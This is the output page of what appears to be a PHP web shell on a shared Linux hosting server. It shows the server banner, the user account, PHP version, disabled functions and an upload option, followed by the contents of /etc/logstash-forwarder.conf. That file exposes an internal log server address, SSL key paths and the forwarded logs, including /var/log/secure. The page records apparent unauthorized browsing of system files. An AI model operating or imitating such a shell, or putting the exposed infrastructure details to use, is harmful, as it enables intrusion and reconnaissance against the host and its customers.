HEX
Server: Apache
System: Linux hp3-wp-1011395.hostingp3.local 3.10.0-1160.144.1.el7.tuxcare.els4.x86_64 #1 SMP Tue Apr 7 08:40:40 UTC 2026 x86_64
User: csh2428284 (2038043)
PHP: 7.3.33
Disabled: shell_exec,exec,system,popen,set_time_limit
Upload Files
File: //etc/logstash-forwarder.conf
{
  "network": {
    "servers": [ "10.44.221.33:5043" ],
    "ssl key": "/etc/logstash-forwarder.key",
    "ssl ca": "/etc/logstash-forwarder.crt",
    "timeout": 90
  },

  "files": [
    {
      "paths": [ "/var/log/httpd/*.log" ],
      "fields": { "type": "Apache", "tags": "clustered_webhosting" }
    },
    {
      "paths": [ "/var/log/httpd/*_log" ],
      "fields": { "type": "Apache", "tags": "clustered_webhosting" }
    },
    {
      "paths": [ "/var/log/messages" ],
      "fields": { "type": "messages", "tags": "clustered_webhosting" }
    },
    {
      "paths": [ "/var/log/secure" ],
      "fields": { "type": "secure", "tags": "clustered_webhosting" }
    },

    {
      "paths": [ "/var/log/maillog" ],
      "fields": { "type": "maillog", "tags": "clustered_webhosting" }
    }
  ]
}